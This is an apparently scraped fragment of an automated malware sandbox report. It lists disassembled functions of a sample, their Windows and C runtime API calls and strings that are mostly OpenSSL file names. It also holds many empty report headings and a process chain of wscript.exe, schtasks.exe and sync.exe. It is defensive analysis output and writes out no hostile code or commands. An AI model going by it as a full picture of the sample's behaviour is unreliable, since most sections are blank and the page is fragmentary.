Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004E42D0, Relevance: 6.1, APIs: 4, Instructions: 100

Memory Dump Source

Source File: 00000005.00000002.557401570.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.557391743.00400000.00000002.sdmp
Associated: 00000005.00000002.557446489.00578000.00000004.sdmp
Associated: 00000005.00000002.557455791.0057B000.00000002.sdmp
Associated: 00000005.00000002.557480064.0061B000.00000004.sdmp
Associated: 00000005.00000002.557493260.00620000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sync.jbxd

Function 0045D149, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 92

APIs

Part of subcall function 00457B40: strcat.MSVCRT ref: 00457C0A
Part of subcall function 00457B40: strcat.MSVCRT ref: 00457C7A

strlen.MSVCRT ref: 0045D1F1

Part of subcall function 00430510: strlen.MSVCRT ref: 00430554

Strings

- , xrefs: 0045D23F
P, xrefs: 0045D19D
v3_info.c, xrefs: 0045D202

Memory Dump Source

Source File: 00000005.00000002.557401570.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.557391743.00400000.00000002.sdmp
Associated: 00000005.00000002.557446489.00578000.00000004.sdmp
Associated: 00000005.00000002.557455791.0057B000.00000002.sdmp
Associated: 00000005.00000002.557480064.0061B000.00000004.sdmp
Associated: 00000005.00000002.557493260.00620000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sync.jbxd

Function 0049BD00, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 92

APIs

Part of subcall function 004B0AC0: gmtime.MSVCRT ref: 004B0ACF

strlen.MSVCRT ref: 0049BDE5

Strings

A, xrefs: 0049BE4A
a_gentm.c, xrefs: 0049BD69, 0049BE42
%04d%02d%02d%02d%02d%02dZ, xrefs: 0049BDC1

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00445D40, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 89

APIs

strlen.MSVCRT ref: 00445DD8
_strnicmp.MSVCRT ref: 00445E3F
strlen.MSVCRT ref: 00445E57

Strings

PRIVATE KEY, xrefs: 00445D41

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 0045A2DC, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 80

APIs

Part of subcall function 00456CB0: strlen.MSVCRT ref: 00456CC1
Part of subcall function 00456CB0: strncmp.MSVCRT ref: 00456CD3

strlen.MSVCRT ref: 0045A18B
strlen.MSVCRT ref: 0045A309

Part of subcall function 0040C4B0: memcpy.MSVCRT ref: 0040C519
Part of subcall function 0040C4B0: strlen.MSVCRT ref: 0040C567

Strings

organization, xrefs: 0045A36E
explicitText, xrefs: 0045A345
noticeNumbers, xrefs: 0045A384

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004E53F0, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 74

APIs

calloc.MSVCRT ref: 004E5413
free.MSVCRT ref: 004E54B7

Part of subcall function 004E29A0: CloseHandle.KERNEL32 ref: 004E29BD
Part of subcall function 004E29A0: free.MSVCRT(?,?,00000000,00000000,004E2D2B,?,?,00000000,00000004,004E32AD), ref: 004E29C9

free.MSVCRT ref: 004E54DB

Strings

, xrefs: 004E5404

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 0040C4B0, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 70

APIs

memcpy.MSVCRT ref: 0040C519
strlen.MSVCRT ref: 0040C567

Strings

asn1_lib.c, xrefs: 0040C4E1, 0040C542, 0040C588
A, xrefs: 0040C590

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00405290, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 59

APIs

Part of subcall function 004301C0: memset.MSVCRT ref: 00430254
Part of subcall function 004301C0: memset.MSVCRT ref: 0043027A

memcpy.MSVCRT ref: 004052EC

Strings

s, xrefs: 00405353
u, xrefs: 0040535B
bss_mem.c, xrefs: 00405318, 0040534B

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00449E60, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40

APIs

strlen.MSVCRT ref: 00449E71
strlen.MSVCRT ref: 00449E7B
strcmp.MSVCRT ref: 00449E94

Strings

PRIVATE KEY, xrefs: 00449E60

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00416E1C, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 36

APIs

strlen.MSVCRT ref: 00416DC2
memcpy.MSVCRT ref: 00416DFD

Strings

h, xrefs: 00416DCA
obj_lib.c, xrefs: 00416DD2

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 0040C960, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 30

APIs

memcpy.MSVCRT ref: 0040C991

Strings

m, xrefs: 0040C9B5
evp_asn1.c, xrefs: 0040C9A8
U, xrefs: 0040C9A0

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004319A9, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 27

APIs

GetLastError.KERNEL32 ref: 004319B0

Strings

',', xrefs: 004319EE
fopen(', xrefs: 004319F6
t, xrefs: 00431A26

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004D4620, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142

APIs

abort.MSVCRT ref: 004D478E
abort.MSVCRT ref: 004D47DB

Strings

@, xrefs: 004D4732

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004E2CC0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54

APIs

fprintf.MSVCRT ref: 004E2D5C

Part of subcall function 004E29A0: CloseHandle.KERNEL32 ref: 004E29BD
Part of subcall function 004E29A0: free.MSVCRT(?,?,00000000,00000000,004E2D2B,?,?,00000000,00000004,004E32AD), ref: 004E29C9

free.MSVCRT(?,?,00000000,00000004,004E32AD), ref: 004E2D38

Strings

%p not found?!?!, xrefs: 004E2D4E

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00413910, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44

APIs

Part of subcall function 00413770: GetStdHandle.KERNEL32 ref: 0041377F
Part of subcall function 00413770: GetFileType.KERNEL32 ref: 00413791
Part of subcall function 00413770: _vsnprintf.MSVCRT ref: 004137C7
Part of subcall function 00413770: GetVersion.KERNEL32 ref: 004137D5
Part of subcall function 00413770: RegisterEventSourceA.ADVAPI32 ref: 004137FF
Part of subcall function 00413770: ReportEventA.ADVAPI32 ref: 00413855
Part of subcall function 00413770: DeregisterEventSource.ADVAPI32 ref: 00413861
Part of subcall function 00413770: MessageBoxA.USER32 ref: 0041388E
Part of subcall function 00413770: _vsnprintf.MSVCRT ref: 004138C5
Part of subcall function 00413770: WriteFile.KERNEL32 ref: 004138F0

raise.MSVCRT ref: 0041393E
_exit.MSVCRT ref: 0041394A

Strings

%s(%d): OpenSSL internal error, assertion failed: %s, xrefs: 00413917

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004E3250, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33

APIs

Part of subcall function 004E2C10: calloc.MSVCRT ref: 004E2C50
Part of subcall function 004E2C10: calloc.MSVCRT ref: 004E2CA8

Part of subcall function 004E2510: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,004E7324,?,?,?,005704F9), ref: 004E2560
Part of subcall function 004E2510: WaitForSingleObject.KERNEL32 ref: 004E25A2
Part of subcall function 004E2510: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,004E7324,?,?,?,005704F9,?,?,?,?,00000001), ref: 004E25C5
Part of subcall function 004E2510: CreateEventA.KERNEL32 ref: 004E260F
Part of subcall function 004E2510: CloseHandle.KERNEL32 ref: 004E262E
Part of subcall function 004E2510: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,004E7324,?,?,?,005704F9), ref: 004E263C

fprintf.MSVCRT ref: 004E3299

Part of subcall function 004E2D90: TlsAlloc.KERNEL32(?,?,004E32BA), ref: 004E2D93
Part of subcall function 004E2D90: abort.MSVCRT(?,?,004E32BA), ref: 004E2DA7

Part of subcall function 004E2810: GetCurrentThreadId.KERNEL32 ref: 004E2867
Part of subcall function 004E2810: SetEvent.KERNEL32 ref: 004E2896

Part of subcall function 004E2CC0: free.MSVCRT(?,?,00000000,00000004,004E32AD), ref: 004E2D38
Part of subcall function 004E2CC0: fprintf.MSVCRT ref: 004E2D5C

Strings

once %p is %d, xrefs: 004E328B
Error cleaning up spin_keys for thread , xrefs: 004E3250

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004E1DF0, Relevance: 5.1, APIs: 4, Instructions: 89

APIs

EnterCriticalSection.KERNEL32 ref: 004E1E3A
LeaveCriticalSection.KERNEL32 ref: 004E1E66
LeaveCriticalSection.KERNEL32 ref: 004E1EE3

Part of subcall function 004E1A90: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,004E1F61), ref: 004E1AB0
Part of subcall function 004E1A90: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004E1F61), ref: 004E1ACC
Part of subcall function 004E1A90: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004E1F61), ref: 004E1B03
Part of subcall function 004E1A90: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,004E1F61), ref: 004E1B17

LeaveCriticalSection.KERNEL32 ref: 004E1EFA

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004E1CD0, Relevance: 5.1, APIs: 4, Instructions: 88

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,004E5A9B), ref: 004E1D1A
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,004E5A9B), ref: 004E1D40
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,004E5A9B), ref: 004E1DB3

Part of subcall function 004E1A90: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,004E1F61), ref: 004E1AB0
Part of subcall function 004E1A90: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004E1F61), ref: 004E1ACC
Part of subcall function 004E1A90: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004E1F61), ref: 004E1B03
Part of subcall function 004E1A90: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,004E1F61), ref: 004E1B17

LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,004E5A9B), ref: 004E1DDA

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004E1A90, Relevance: 5.1, APIs: 4, Instructions: 58

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,004E1F61), ref: 004E1AB0
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004E1F61), ref: 004E1ACC

Part of subcall function 004E17B0: WaitForMultipleObjects.KERNEL32 ref: 004E17FA
Part of subcall function 004E17B0: WaitForSingleObject.KERNEL32 ref: 004E183D
Part of subcall function 004E17B0: ResetEvent.KERNEL32 ref: 004E1A02

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004E1F61), ref: 004E1B03
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,004E1F61), ref: 004E1B17

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Signature Overview

AV Detection:

Cryptography:

Spam, unwanted Advertisements and Ransom Demands:

Software Vulnerabilities:

Networking:

Boot Survival:

Stealing of Sensitive Information:

Persistence and Installation Behavior:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Domains

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Joe Sandbox View / Context

IPs

Domains

ASN

Dropped Files

Screenshot

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Packets

HTTPS Proxied Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: wscript.exe PID: 3112 Parent PID: 2740

General

Analysis Process: schtasks.exe PID: 3292 Parent PID: 3112

General

Analysis Process: sync.exe PID: 3356 Parent PID: 3324

General